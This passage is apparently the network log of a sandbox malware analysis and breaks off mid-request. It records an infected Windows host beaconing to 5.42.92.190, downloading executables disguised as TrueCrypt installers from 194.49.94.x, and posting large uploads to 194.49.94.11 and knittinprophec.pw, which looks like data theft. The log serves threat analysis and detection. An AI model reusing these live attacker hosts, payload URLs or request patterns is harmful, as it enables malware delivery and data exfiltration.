Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://doauvpmjwanesjyt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://knwweputqcslqpyr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wfyiufgjmtnc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 207
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bfidemswgufov.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 329
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 37
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gjjwpkcimxxdgr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 312
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://feyvmwkmmsipf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 138
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qdbihkuhbanrh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 159
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://owqgytiwgirqwcy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 289
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 53
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://194.49.94.72/1.exe

Explorer.EXE

Remote address:

194.49.94.72:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.72

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:06:23 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Wed, 15 Nov 2023 20:36:00 GMT
ETag: "45600-60a36d9e76d64"
Accept-Ranges: bytes
Content-Length: 284160
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://194.49.94.145/traffico.exe

Explorer.EXE

Remote address:

194.49.94.145:80

Request

GET /traffico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.145

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:06:24 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 16 Nov 2023 16:34:23 GMT
ETag: "6ed14-60a4797a219c1"
Accept-Ranges: bytes
Content-Length: 453908
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

72.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.94.49.194.in-addr.arpa

IN PTR

Response
GET

http://194.49.94.120/TrueCrypt_lDwnwJ.exe

Explorer.EXE

Remote address:

194.49.94.120:80

Request

GET /TrueCrypt_lDwnwJ.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.120

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:06:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Wed, 15 Nov 2023 20:19:53 GMT
ETag: "1186000-60a36a043a58d"
Accept-Ranges: bytes
Content-Length: 18374656
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

145.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.94.49.194.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.11/

23C0.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 194.49.94.11
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 17 Nov 2023 16:06:26 GMT
POST

http://194.49.94.11/

23C0.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 194.49.94.11
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 17 Nov 2023 16:06:31 GMT
POST

http://194.49.94.11/

23C0.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 194.49.94.11
Content-Length: 1792140
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 17 Nov 2023 16:06:38 GMT
POST

http://194.49.94.11/

23C0.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.49.94.11
Content-Length: 1792132
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 17 Nov 2023 16:06:38 GMT
DNS

120.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.94.49.194.in-addr.arpa

IN PTR

Response
DNS

11.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.94.49.194.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
GET

https://api.ip.sb/geoip

23C0.exe

Remote address:

172.67.75.172:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:06:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 369
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jluYb1PcIJspGCIOqtCuf%2FW4gB6JMWaZ%2FtAArNJjjYk9Mz%2FX3YWKzP1iLc4xPPpQG3kWOfIwFseIsIHqvh7YEzDpsNj%2BazBFKnuscqK%2Bj2tH2tCRMDd6a6EidQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 827938b5b993b97e-AMS
alt-svc: h3=":443"; ma=86400
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fwblnlritpsobhkm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 234
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hxrjqnukurxgwm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:06:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 53
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://194.49.94.120/TrueCrypt_vlBfql.exe

Explorer.EXE

Remote address:

194.49.94.120:80

Request

GET /TrueCrypt_vlBfql.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.120

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:06:52 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 16 Nov 2023 19:32:20 GMT
ETag: "1015e00-60a4a14104e88"
Accept-Ranges: bytes
Content-Length: 16866816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

knittinprophec.pw

ADelRCP.exe

Remote address:

8.8.8.8:53

Request

knittinprophec.pw

IN A

Response

knittinprophec.pw

IN A

172.67.207.245

knittinprophec.pw

IN A

104.21.58.216
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=30qcf8bem1sq4jcodviubfvlms; expires=Tue, 12 Mar 2024 09:53:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ONaDQ8FCMdeVfO36tZ%2BgpWrbArPFULgyzXjwL1%2Bp34863yiwXXEKcxhwwoW2XKViVkjNSCK0EAOcmhC0j4%2FCT4n241%2FGQ0oL0x%2BfrumVFRtTcBu6%2Ft%2BqWb%2Fc72pqBw8VoCRC0w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939762b6e0b75-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nqsb5879njpn7574gttt1agtbc; expires=Tue, 12 Mar 2024 09:53:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ekB4falov5lOIVfpIkuIo29a8ZnWoxOYZQ18t%2BD4B5SP9%2BXcolAhEXdTVquIuEB6pwyeeyDv6yXoky%2B%2B0FV5m8BQ8pVBzvTtVIixBrnH88D7JC%2FrguNXnwNYG1uSQjv7j20mfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8279397efe8a0b75-AMS
DNS

knittinprophec.pw

ADelRCP.exe

Remote address:

8.8.8.8:53

Request

knittinprophec.pw

IN A

Response

knittinprophec.pw

IN A

172.67.207.245

knittinprophec.pw

IN A

104.21.58.216
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: knittinprophec.pw
Content-Length: 47
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5nrem905ttnkge9kloukkm4mio; expires=Tue, 12 Mar 2024 09:53:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bUxuQl26G2T%2Fyg8QCAHn8STlVq%2FigJqIqLrgVR2282Xr0TLcoIeUis0X%2BGPIhn6oJzJuj%2Bd%2FBXlQEvUSaL6NPN2qlDe5mGjhyd4UFYaQgGwCL1Cpn1SFp0VJwYN636rdq2iGUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8279397a7df36562-AMS
DNS

245.207.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.207.67.172.in-addr.arpa

IN PTR

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jiuu0uvnm4eq8osn0s03dje9bg; expires=Tue, 12 Mar 2024 09:53:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SNHm58vGylq%2F2hKZW5%2F02JI00nVqOkhasTIoPv2yGaUYRsdDeVxgJxLAXYo8LjMAFgHt4hVKWkAm41SJmMMlxGgXAO5KOcjUABJZcYH0jNkO%2FVXu4H7gcGLLsilZTelOcaxd%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939821fe7668b-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=drsc6o1kr4dvig938gv82sv32n; expires=Tue, 12 Mar 2024 09:53:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2DKl8Bifgi1XyHou3IcQ%2Fx68wyrWYfa3N8VS44VcPl9%2FTOqKDjYJvpNqheRoRpC3yqGD8nd8%2BiVlRh1W3jSqFslKyvGEs1B5FDQp9QrW%2FiABjcVQNffX3arzqQ%2F9qBm9Bb1zrw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939862f8f6718-AMS
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oiyxnvvjlphgtyoq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 143
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nwxiwvajyph.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rxgrxcltdpygk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 200
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kahmmrngkwsjlq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 203
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://aumekumunrlualo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 286
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fhrqwlvfnnhug.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 110
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mgqtvehdlta.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 194
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jnxtvjgjaacfm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 267
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 100
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ufwvmnhvmlheb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 334
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Explorer.EXE

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xxwmvqpntljtflpg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 221
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Fri, 17 Nov 2023 16:07:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
